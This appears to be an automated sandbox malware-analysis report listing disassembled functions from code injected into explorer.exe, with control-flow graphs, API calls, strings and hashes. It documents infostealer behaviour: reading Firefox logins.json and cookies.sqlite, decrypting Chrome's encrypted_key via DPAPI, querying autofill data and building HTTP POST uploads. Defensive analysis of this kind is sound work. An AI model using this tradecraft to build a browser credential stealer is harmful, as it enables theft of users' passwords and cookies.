                                                                                                                                                      control_flow_graph 438 a02b15-a02b48 call a01953 FindFirstFileW 442 a02c5c-a02c74 call a01011 * 2 438->442 443 a02b4e 438->443 444 a02b52-a02b57 443->444 446 a02bc8-a02bef call a01953 call a0199d StrStrIW 444->446 447 a02b59-a02b6b lstrcmpiW 444->447 461 a02c10-a02c1e StrStrIW 446->461 462 a02bf1-a02bfa call a01cf7 446->462 450 a02b71-a02b83 lstrcmpiW 447->450 451 a02c3d-a02c4b FindNextFileW 447->451 450->451 454 a02b89-a02b94 call a019b4 450->454 451->444 455 a02c51-a02c58 FindClose 451->455 463 a02b96-a02b9b 454->463 464 a02b9d 454->464 455->442 467 a02c20-a02c29 call a01cf7 461->467 468 a02c36-a02c38 call a01011 461->468 462->461 474 a02bfc-a02c0b call a0278e 462->474 466 a02b9f-a02bc3 call a01953 call a0199d call a02ae9 call a01011 463->466 464->466 466->446 467->468 476 a02c2b-a02c31 call a0287d 467->476 468->451 474->461 476->468
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00A02B3D
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00A562CC), ref: 00A02B63
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00A562D0), ref: 00A02B7B
                                                                                                                                                        • Part of subcall function 00A019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00A02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00A019C4
                                                                                                                                                      • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00A02BE7
                                                                                                                                                      • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00A02C16
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A02C43
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00A02C52
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                                                      • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                                                      • API String ID: 1108783765-3717368146
                                                                                                                                                      • Opcode ID: e078a2760dc3f581c7c545a66e1981797de6b468a2509a821d4f68218893905d
                                                                                                                                                      • Instruction ID: 5d9d3b948cc3f0a73044c1278014899ae968b6b50299c1d6c38b5b472a9fe85f
                                                                                                                                                      • Opcode Fuzzy Hash: e078a2760dc3f581c7c545a66e1981797de6b468a2509a821d4f68218893905d
                                                                                                                                                      • Instruction Fuzzy Hash: A2319E307043095BDB14AF70A999BBF739ABB84745F444A2CF946D32C2EB79CD069352
                                                                                                                                                      Function 00A01D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109stringfileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 531 a01d4a-a01d5c 532 a01d62-a01d66 531->532 533 a01eb4-a01ebe 531->533 532->533 534 a01d6c-a01d77 call a019b4 532->534 537 a01d79-a01d89 call a01953 534->537 538 a01d8b-a01d97 call a01953 534->538 543 a01d9b-a01d9d 537->543 538->543 543->533 544 a01da3-a01db4 FindFirstFileW 543->544 545 a01dba 544->545 546 a01ead-a01eaf call a01011 544->546 548 a01dbe-a01dc3 545->548 546->533 549 a01dc5-a01dd7 lstrcmpiW 548->549 550 a01e3d-a01e6a call a01953 call a0199d lstrcmpiW 548->550 552 a01ddd-a01def lstrcmpiW 549->552 553 a01e8e-a01e9c FindNextFileW 549->553 561 a01e87-a01e89 call a01011 550->561 562 a01e6c-a01e75 call a01cf7 550->562 552->553 556 a01df5-a01e00 call a019b4 552->556 553->548 554 a01ea2-a01ea9 FindClose 553->554 554->546 563 a01e02-a01e07 556->563 564 a01e09 556->564 561->553 562->561 571 a01e77-a01e7f 562->571 567 a01e0b-a01e3b call a01953 call a0199d call a01d4a 563->567 564->567 567->561 571->561
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00A02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00A019C4
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00A01DA9
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00A562CC), ref: 00A01DCF
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00A562D0), ref: 00A01DE7
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00A01E62
                                                                                                                                                        • Part of subcall function 00A01CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00A02C27), ref: 00A01D02
                                                                                                                                                        • Part of subcall function 00A01CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00A01D0D
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A01E94
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00A01EA3
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                                                      • String ID: *.*$\*.*
                                                                                                                                                      • API String ID: 232625764-1692270452
                                                                                                                                                      • Opcode ID: 42891e062222e5636adfb302bab74e24e36bde6853783ac28f07f3015754ea83
                                                                                                                                                      • Instruction ID: 94311dd7a57292b383d35162122d300122d3e3a9989467d2ba49dff967883967
                                                                                                                                                      • Opcode Fuzzy Hash: 42891e062222e5636adfb302bab74e24e36bde6853783ac28f07f3015754ea83
                                                                                                                                                      • Instruction Fuzzy Hash: 2B3182307043499BCB11EB74A998AFF76E9BFC4341F444A29F94A832D1EB35CC498652
                                                                                                                                                      Function 00A03E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75encryptionCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 641 a03e04-a03e11 call a01b6a 644 a03ed4-a03ed8 641->644 645 a03e17-a03e22 call a01c31 641->645 645->644 648 a03e28-a03e34 call a02fb1 645->648 651 a03ec8-a03ecc 648->651 652 a03e3a-a03e4f call a0123b 648->652 651->644 655 a03ec0-a03ec7 call a01011 652->655 656 a03e51-a03e58 652->656 655->651 658 a03e5a-a03e6a 656->658 659 a03ebf 656->659 661 a03eb8-a03eba call a01011 658->661 662 a03e6c-a03e7c RtlCompareMemory 658->662 659->655 661->659 662->661 663 a03e7e-a03ea6 CryptUnprotectData 662->663 663->661 665 a03ea8-a03ead 663->665 665->661 666 a03eaf-a03eb3 665->666 666->661
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
                                                                                                                                                        • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
                                                                                                                                                        • Part of subcall function 00A01C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00A03E1E,00000000,?,00A03FA8), ref: 00A01C46
                                                                                                                                                        • Part of subcall function 00A01C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00A03FA8), ref: 00A01C56
                                                                                                                                                        • Part of subcall function 00A01C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00A03FA8), ref: 00A01C76
                                                                                                                                                        • Part of subcall function 00A01C31: CloseHandle.KERNEL32(00000000,?,00A03FA8), ref: 00A01C91
                                                                                                                                                        • Part of subcall function 00A02FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00A03E30,00000000,00000000,?,00A03FA8), ref: 00A02FC1
                                                                                                                                                        • Part of subcall function 00A02FB1: lstrlen.KERNEL32("encrypted_key":",?,00A03FA8), ref: 00A02FCE
                                                                                                                                                        • Part of subcall function 00A02FB1: StrStrIA.SHLWAPI("encrypted_key":",00A5692C,?,00A03FA8), ref: 00A02FDD
                                                                                                                                                        • Part of subcall function 00A0123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00A03E4B,00000000), ref: 00A0124A
                                                                                                                                                        • Part of subcall function 00A0123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01268
                                                                                                                                                        • Part of subcall function 00A0123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01295
                                                                                                                                                      • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00A03E74
                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A03E9E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                                                      • String ID: $DPAP$DPAP$IDPAP
                                                                                                                                                      • API String ID: 3076719866-957854035
                                                                                                                                                      • Opcode ID: b220322d2c6b0975be7bf5d2f92f08bfb6d8da8380e280c774f9512623b00133
                                                                                                                                                      • Instruction ID: d55e110e1a6a5d618ec36e31e4bd44a939863622278e9d18f6e09830b1c9d9a3
                                                                                                                                                      • Opcode Fuzzy Hash: b220322d2c6b0975be7bf5d2f92f08bfb6d8da8380e280c774f9512623b00133
                                                                                                                                                      • Instruction Fuzzy Hash: C22181726043495BDB11EF68ED80ABFB6EDAF84700F44062EF945D7281EB74CE498792
                                                                                                                                                      Function 00A04B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00A0116F
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00A04BB6
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00A04BBF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1675517319-0
                                                                                                                                                      • Opcode ID: 3602a904a33dffd3a23d939f62f212c04c4ade1a3dea33b1a8a253b6d8fcc114
                                                                                                                                                      • Instruction ID: 3eb7aaf41d86b4430bf2b30642496372086f76edc5ed050efdfd2a3643017ffe
                                                                                                                                                      • Opcode Fuzzy Hash: 3602a904a33dffd3a23d939f62f212c04c4ade1a3dea33b1a8a253b6d8fcc114
                                                                                                                                                      • Instruction Fuzzy Hash: C5E0D87180031467C658BB70BD49B8B3B58BF9A361F10C669F356820D0CA31C8418650
                                                                                                                                                      Function 00A01000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: 55fa977d670a08d48b66aafc39f685270713ca3f8f9b0a3e51e206a7aa70c10d
                                                                                                                                                      • Instruction ID: e48330807296c1b1ac046ca7438b3839aa3aec0b09e2c9d40649d32f6fe5e01c
                                                                                                                                                      • Opcode Fuzzy Hash: 55fa977d670a08d48b66aafc39f685270713ca3f8f9b0a3e51e206a7aa70c10d
                                                                                                                                                      • Instruction Fuzzy Hash: D5A002755507045BDD4497F49E0DA2A3518F744703F504744B24587451D96454058721
                                                                                                                                                      Function 00A06512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemInfo.KERNELBASE(00A620A4,00000001,00000000,0000000A,00A53127,00A028DA,00000000,?), ref: 00A0BFFC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 31276548-0
                                                                                                                                                      • Opcode ID: 5363882874a0cdd3203ef732f48f7198dabc4cc7c7677bce05b9ac4af08bfd45
                                                                                                                                                      • Instruction ID: 2b1d251c94097a26bd9536f8100683d2e6b74f10c253721accc7dad9d2799894
                                                                                                                                                      • Opcode Fuzzy Hash: 5363882874a0cdd3203ef732f48f7198dabc4cc7c7677bce05b9ac4af08bfd45
                                                                                                                                                      • Instruction Fuzzy Hash: 8BE01A3178430875E62037F87E57F1A1A759F81F08F648A15FB10E90CADFD5A1A12026
                                                                                                                                                      Function 00A03C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147stringfileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
                                                                                                                                                        • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 00A03C6A
                                                                                                                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00A03C76
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00A03C7D
                                                                                                                                                      • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00A03C89
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00A03D2F
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A03D36
                                                                                                                                                      • wsprintfA.USER32 ref: 00A03D55
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A03D61
                                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 00A03D89
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00A03DB2
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00A03DED
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                                                      • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                                                      • API String ID: 2923052733-3488123210
                                                                                                                                                      • Opcode ID: 1b9eafff44b60bb9ecb2d07ff2054349ade7ed9d8bb5f77cdfb8432841720d1b
                                                                                                                                                      • Instruction ID: ff7ee2c6b7f4dd80d1a3f63ee6bf85941b61b30c3ce9c0fa7a5209b0802e3d68
                                                                                                                                                      • Opcode Fuzzy Hash: 1b9eafff44b60bb9ecb2d07ff2054349ade7ed9d8bb5f77cdfb8432841720d1b
                                                                                                                                                      • Instruction Fuzzy Hash: C341D031204309AFDB11BB70AD81E7F7AADFF85745F40482DF942A3292DA35DD068B62
                                                                                                                                                      Function 00A028F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 348 a028f8-a028fa 349 a02900-a0291c call a01000 call a202ec 348->349 350 a02ac8-a02ada call a53848 DeleteFileW call a01011 348->350 359 a02922-a0293a call a01fa7 349->359 360 a02a8f-a02aa2 call a1fb92 lstrlen 349->360 357 a02adf-a02ae6 350->357 367 a02948-a0295f call a01fa7 359->367 368 a0293c-a02942 359->368 365 a02ac1-a02ac3 call a01011 360->365 366 a02aa4-a02abc call a01798 * 3 360->366 365->350 366->365 376 a02961-a02967 367->376 377 a0296d-a02984 call a01fa7 367->377 368->367 370 a02944 368->370 370->367 376->377 380 a02969 376->380 383 a02992-a029a7 call a01fa7 377->383 384 a02986-a0298c 377->384 380->377 388 a029b5-a029cc call a01fa7 383->388 389 a029a9-a029af 383->389 384->383 385 a0298e 384->385 385->383 393 a029da-a029e5 lstrlen 388->393 394 a029ce-a029d4 388->394 389->388 390 a029b1 389->390 390->388 395 a02a79-a02a85 call a202ec 393->395 396 a029eb-a029f0 lstrlen 393->396 394->393 397 a029d6 394->397 395->359 402 a02a8b 395->402 396->395 398 a029f6-a02a11 call a01000 396->398 397->393 404 a02a13 398->404 405 a02a1b-a02a56 call a02112 wsprintfA lstrlen 398->405 402->360 404->405 408 a02a58-a02a68 call a0102f 405->408 409 a02a6a-a02a74 lstrcat call a01011 405->409 408->409 409->395
                                                                                                                                                      APIs
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00A02AD2
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A029E1
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A029EC
                                                                                                                                                      • wsprintfA.USER32 ref: 00A02A38
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A02A44
                                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A02A6C
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00A02A99
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                                                      • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                                                      • API String ID: 304071051-2605711689
                                                                                                                                                      • Opcode ID: 10e94f72b88b64d2e4e709ae0007bed3c7fdb457505a8d75a573fadd79a8804f
                                                                                                                                                      • Instruction ID: ad6c17f59840372de5b355ade7f9102988cc80892249744c06e11baeaa2e7c0b
                                                                                                                                                      • Opcode Fuzzy Hash: 10e94f72b88b64d2e4e709ae0007bed3c7fdb457505a8d75a573fadd79a8804f
                                                                                                                                                      • Instruction Fuzzy Hash: F851BE3060434A9BC725EF30A994B7F76DABF85345F44482DF8819B292DB35DC098B52
                                                                                                                                                      Function 00A02CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 484 a02cb5-a02cc7 call a01953 488 a02e17-a02e2d call a02ae9 484->488 489 a02ccd-a02d06 call a01953 call a01000 * 2 call a01b6a 484->489 500 a02df9-a02e12 call a01011 * 4 489->500 501 a02d0c-a02d1c GetPrivateProfileSectionNamesW 489->501 500->488 501->500 502 a02d22-a02d26 501->502 504 a02df5 502->504 505 a02d2c-a02d32 502->505 504->500 507 a02d36-a02d39 505->507 509 a02ded-a02df1 507->509 510 a02d3f-a02d4d StrStrIW 507->510 509->504 512 a02d53-a02d70 GetPrivateProfileStringW 510->512 513 a02dd7-a02de7 lstrlenW 510->513 512->513 516 a02d72-a02d88 GetPrivateProfileIntW 512->516 513->507 513->509 518 a02d8a-a02d9c call a01953 516->518 519 a02dcc-a02dd2 call a02ae9 516->519 523 a02db4-a02dca call a02ae9 call a01011 518->523 524 a02d9e-a02da2 518->524 519->513 523->513 526 a02da4-a02daa 524->526 527 a02dac-a02db2 524->527 526->527 527->523 527->524
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                        • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
                                                                                                                                                        • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
                                                                                                                                                      • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00A02D13
                                                                                                                                                      • StrStrIW.SHLWAPI(00000000,Profile), ref: 00A02D45
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,Path,00A5637C,?,00000FFF,?), ref: 00A02D68
                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00A02D7B
                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 00A02DD8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                                                      • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                                      • API String ID: 2234428054-4107377610
                                                                                                                                                      • Opcode ID: 4236cdcdce4b462ec602504a7ae8913d65ee9c831e08aebdd6c23af6867eebc7
                                                                                                                                                      • Instruction ID: 6d2b65046eaaea6e709651d9b556c03535bd6315414f43545ea456686e412986
                                                                                                                                                      • Opcode Fuzzy Hash: 4236cdcdce4b462ec602504a7ae8913d65ee9c831e08aebdd6c23af6867eebc7
                                                                                                                                                      • Instruction Fuzzy Hash: 0C31BD3070430A9BDB20AF70A92577FB7A2BFC8340F50482DF946A72D2DE758C469792
                                                                                                                                                      Function 00A01333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 576 a01333-a01385 call a01000 call a0106c call a012a3 583 a013a0-a013a3 576->583 584 a01387-a0139e 576->584 586 a013aa-a013ac 583->586 587 a013b0-a013b2 584->587 586->587 588 a013b8-a013ef RtlZeroMemory 587->588 589 a015cb-a015da call a01011 587->589 593 a015c3-a015ca 588->593 594 a013f5-a0141a 588->594 593->589 597 a01420-a01456 call a010b1 594->597 598 a015bf 594->598 601 a01458 597->601 602 a0145d-a01478 597->602 598->593 601->602 604 a015b5 602->604 605 a0147e-a01483 602->605 604->598 606 a01485-a01496 605->606 607 a0149d-a014c7 call a01000 wsprintfW 605->607 606->607 610 a014e0-a01509 607->610 611 a014c9-a014cb 607->611 618 a015a5-a015b0 call a01011 610->618 619 a0150f-a0151b 610->619 612 a014cc-a014cf 611->612 613 a014d1-a014d6 612->613 614 a014da-a014dc 612->614 613->612 616 a014d8 613->616 614->610 616->610 618->604 619->618 622 a01521-a01537 call a01000 619->622 626 a01539-a01544 622->626 627 a01546-a01553 call a0102f 626->627 628 a01558-a0156f 626->628 627->628 632 a01571 628->632 633 a01573-a0157d 628->633 632->633 633->626 634 a0157f-a01583 633->634 635 a01585 call a0104c 634->635 636 a0159a-a015a1 call a01011 634->636 639 a0158a-a01594 RtlMoveMemory 635->639 636->618 639->636
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                        • Part of subcall function 00A0106C: lstrlen.KERNEL32(00CE63AE,00000000,00000000,00000000,00A01366,771A8A60,00CE63AE,00000000), ref: 00A01074
                                                                                                                                                        • Part of subcall function 00A0106C: MultiByteToWideChar.KERNEL32(00000000,00000000,00CE63AE,00000001,00000000,00000000), ref: 00A01086
                                                                                                                                                        • Part of subcall function 00A012A3: RtlZeroMemory.NTDLL(?,00000018), ref: 00A012B5
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 00A013C2
                                                                                                                                                      • wsprintfW.USER32 ref: 00A014B5
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00A01594
                                                                                                                                                      Strings
                                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 00A014FB
                                                                                                                                                      • POST, xrefs: 00A01465
                                                                                                                                                      • Accept: */*Referer: %S, xrefs: 00A014AF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
